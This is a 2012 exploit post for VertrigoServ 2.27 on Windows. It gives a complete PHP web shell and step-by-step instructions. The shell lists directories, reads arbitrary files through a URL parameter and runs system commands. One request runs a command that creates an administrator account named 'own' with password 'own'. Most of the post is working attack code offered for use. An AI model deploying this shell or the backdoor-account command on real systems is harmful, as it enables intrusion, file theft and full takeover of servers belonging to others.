Vertrigoserv 2.27 Local Privilege Escalation Exploit

2012.05.19
Credit: X-Cisadane
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

=====================================================
Vertrigoserv 2.27 Local Privilege Escalation Exploit
=====================================================

:---------------------------------------------------------------------------:
: # Exploit Title : Vertrigoserv 2.27 Local Privilege Escalation Exploit
: # Date          : May 19th 2012
: # Author        : X-Cisadane
: # Software Link : http://vertrigo.sourceforge.net/
: # Version       : 2.27
: # Category      : Desktop (Windows) Applications
: # Platform      : Win32
: # Vulnerability : Local Privilege Escalation Exploit
: # Tested On     : Windows XP Professional Service Pack 3
: # Greetz to     : Inphex, X-Code, Borneo Crew, Depok Cyber, Dunia Santai, Jiban Crew, CodeNesia, Axon Code, Jember Hacker, Explore Crew, Winda Utari
:---------------------------------------------------------------------------:

Proof Of Concept :
================

[ENGLISH]

1. Run VertrigoServ.
2. Create a file named script.php in X:\VertrigoServ Installation Directory\www\
3. Fill script.php with this script and save it:

    <?php
    //I'm using code from Inphex (inphex0 at googlemail.com)
    //Copyrighted (C) Inphex
    error_reporting(E_ALL ^ E_NOTICE);
    $qQa = ($_GET['qmB'] == "")?"./":$_GET['qmB'];
    $qQd = opendir($qQa);
    if (isset($_GET['qrF'])) {
        $qrX = fopen($_GET['qrF'],"r");
        echo fread($qrX,50000);
        exit;
    } elseif(isset($_GET['qQx'])) {
        exec("net user own own /add & net localgroup Administrators own /add");
        echo "User own -> full privileges successfully added";
        exit;
    }
    echo "<textarea rows=40 cols=80 style='position:absolute;margin-left:390;'>";
    echo htmlspecialchars(shell_exec("cd ".$qQa." & dir"));
    echo "</textarea>";
    while (false !== ($qQr = readdir($qQd))){
        switch(filetype($qQa.$qQr)) {
            case "dir":
                echo "<a href=?qmB=".urlencode(htmlspecialchars(realpath($qQa.$qQr)))."/>".htmlspecialchars($qQr)."</a><br>";
                break;
            case "file":
                echo "<a href=?qrF=".urlencode(htmlspecialchars(realpath($qQa.$qQr))).">".htmlspecialchars($qQr)."</a><br>";
                break;
        }
    }
    ?>

4. Open your browser and go to http://localhost/script.php?qQx
5. If successful, it will show this message: User own -> full privileges successfully added
6. Now open Command Prompt, type Net User and press Enter. It will show a new user (own), and the password is own.

References:

http://vertrigo.sourceforge.net/

